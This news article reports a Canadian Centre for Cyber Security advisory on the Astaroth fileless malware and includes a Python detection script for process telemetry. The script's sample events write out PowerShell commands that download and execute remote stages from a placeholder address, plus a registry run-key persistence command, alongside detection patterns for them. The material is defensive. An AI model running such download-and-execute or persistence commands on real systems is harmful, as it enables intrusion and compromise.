
Astaroth Fileless Malware Targets Windows Systems

The Canadian Centre for Cyber Security (CCCS), a counterpart to the U.S. Cybersecurity and Infrastructure Security Agency (CISA), has issued a warning about a fileless malware campaign hitting Microsoft Windows-based systems.

In the advisory, CCCS officials cautioned that the Astaroth fileless malware, which is memory resident, can be used by attackers to steal credentials, exfiltrate sensitive data and log keystrokes. Astaroth is regarded as far harder to detect than traditional malware because the original infecting executable typically does not remain on the system’s hard drive, so file-based scanning has nothing to find.

The purpose of the advisory, the CCCS said, is to bring “heightened awareness to the increase in the detection and identification of fileless malware, including Astaroth.” In the U.S., CISA urged administrators to review the CCCS alert for potential infection vectors along with mitigation recommendations.

Astaroth gains a foothold on a victim’s system by duping the user into opening a bogus, infected file or visiting a malicious website, the same initial vectors most malware infections rely on. The difference is that Astaroth does not drop its payload as malware files on the hard drive but resides only in memory. Once running, it looks to create entries in the system’s registry (a common persistence mechanism) and abuses legitimate, commonly used Windows components such as PowerShell or Windows Management Instrumentation (WMI) to do its work, so its activity blends in with normal administrative tooling. Ultimately, the infected machine may attempt to propagate to other connected devices, download additional malware onto the infected device, and download and execute scripts.

"Although it is unlikely to prevent all infections, these attacks can be prevented by organizations implementing strong IT security practices that, when used together, will minimize the risk of fileless malware attacks," the agency said. The CCCS's recommended mitigations include:

  • Patch and upgrade management, including staying up to date with vendor-issued security advisories and application releases.
  • A layered IT defense architecture, including hardening of endpoints and disabling non-essential applications and services.
  • Strong user awareness, including cyber security training and encouraging users to report suspicious activity.
  • Log management, including regular reviews of system and server logs and regular audits.
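The behaviour described above (script hosts such as PowerShell launched from a lure document or via WMI, in-memory download and execution, registry entries for persistence) and the log-review recommendation both lend themselves to a detection pass over process-creation telemetry. The Python below is an added example written for this page, not code from the CCCS advisory or from any vendor; it runs over constructed Sysmon-style events embedded inline, and the process names, regular expressions, rule names and the 203.0.113.x placeholder address are assumptions to tune for a given estate rather than Astaroth signatures.

```python
import base64
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    """Minimal process-creation record: the fields Sysmon Event ID 1 or
    Security event 4688 (with command-line auditing enabled) provide."""
    host: str
    parent_image: str
    image: str
    command_line: str


# Generic living-off-the-land heuristics for the behaviour the advisory
# describes. They are assumptions for illustration, not Astaroth signatures;
# the process-name sets will need tuning per environment.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}
ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
RUN_KEY_RE = re.compile(r"\\currentversion\\run(?:once)?\b", re.IGNORECASE)
INMEMORY_RE = re.compile(
    r"(?:-enc(?:odedcommand)?\b|-w(?:indowstyle)?\s+hidden|downloadstring|"
    r"invoke-expression|\biex\b|frombase64string)", re.IGNORECASE)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmd):
    """Recover the script hidden behind -EncodedCommand (base64 of UTF-16LE)."""
    m = ENC_RE.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(ev):
    """Return the names of every heuristic that fires for one event."""
    parent, image, cmd = basename(ev.parent_image), basename(ev.image), ev.command_line
    hits = []
    if image in {"powershell.exe", "pwsh.exe"}:
        # Inspect the decoded payload too, so -enc cannot hide IEX/DownloadString.
        text = cmd + " " + (decode_encoded_command(cmd) or "")
        if INMEMORY_RE.search(text):
            hits.append("powershell_inmemory_exec")
    if parent == "wmiprvse.exe" and image in SCRIPT_HOSTS:
        hits.append("wmi_spawned_script_host")
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        hits.append("office_spawned_script_host")
    if image == "reg.exe" and RUN_KEY_RE.search(cmd) and " add " in f" {cmd.lower()} ":
        hits.append("run_key_persistence")
    return hits


def triage(events):
    """Group findings per host so the analyst sees the chain, not isolated alerts."""
    findings = {}
    for ev in events:
        for rule in classify(ev):
            findings.setdefault(ev.host, []).append((rule, basename(ev.image), ev.command_line))
    return findings


# Constructed sample telemetry (not real events). WS01 shows a lure-document
# chain; WS02 shows only routine administration. 203.0.113.0/24 is a
# documentation address range used here as a placeholder.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/stage1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16le")).decode("ascii")
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcessEvent("WS01", r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", PS,
                 f"powershell.exe -NoP -W Hidden -Enc {ENCODED}"),
    ProcessEvent("WS01", r"C:\Windows\System32\wbem\WmiPrvSE.exe", PS,
                 "powershell.exe -NoProfile -WindowStyle Hidden -Command "
                 "\"IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/stage2')\""),
    ProcessEvent("WS01", PS, r"C:\Windows\System32\reg.exe",
                 r'reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run '
                 r'/v Updater /t REG_SZ /d "C:\Users\Public\upd.vbs" /f'),
    ProcessEvent("WS02", r"C:\Windows\explorer.exe", PS,
                 r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1"),
    ProcessEvent("WS02", r"C:\Windows\System32\services.exe",
                 r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs -p"),
]

if __name__ == "__main__":
    for host, items in triage(SAMPLE_EVENTS).items():
        print(host)
        for rule, image, cmd in items:
            print(f"  [{rule}] {image}: {cmd[:80]}")
```

The point of grouping by host is that no single rule here is conclusive on its own (administrators do run hidden PowerShell windows), but a lure document spawning an encoded PowerShell command, followed by WMI launching a second in-memory downloader and then a run-key write, is the chain the advisory describes and is worth an analyst's time. Decoding the -EncodedCommand payload before matching is what stops the first event from looking like a harmless blob of base64.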

The CCCS is Canada's national computer security incident response team, collaborating with government agencies, critical infrastructure, Canadian businesses and international organizations to prepare for, respond to, mitigate, and recover from cyber events.

D. Howard Kass

D. Howard Kass is a contributing editor to MSSP Alert. He brings a career in journalism and market research to the role. He has served as CRN News Editor, Dataquest Channel Analyst, and West Coast Senior Contributing Editor at Channelnomics. As the CEO of The Viewpoint Group, he led groundbreaking market research.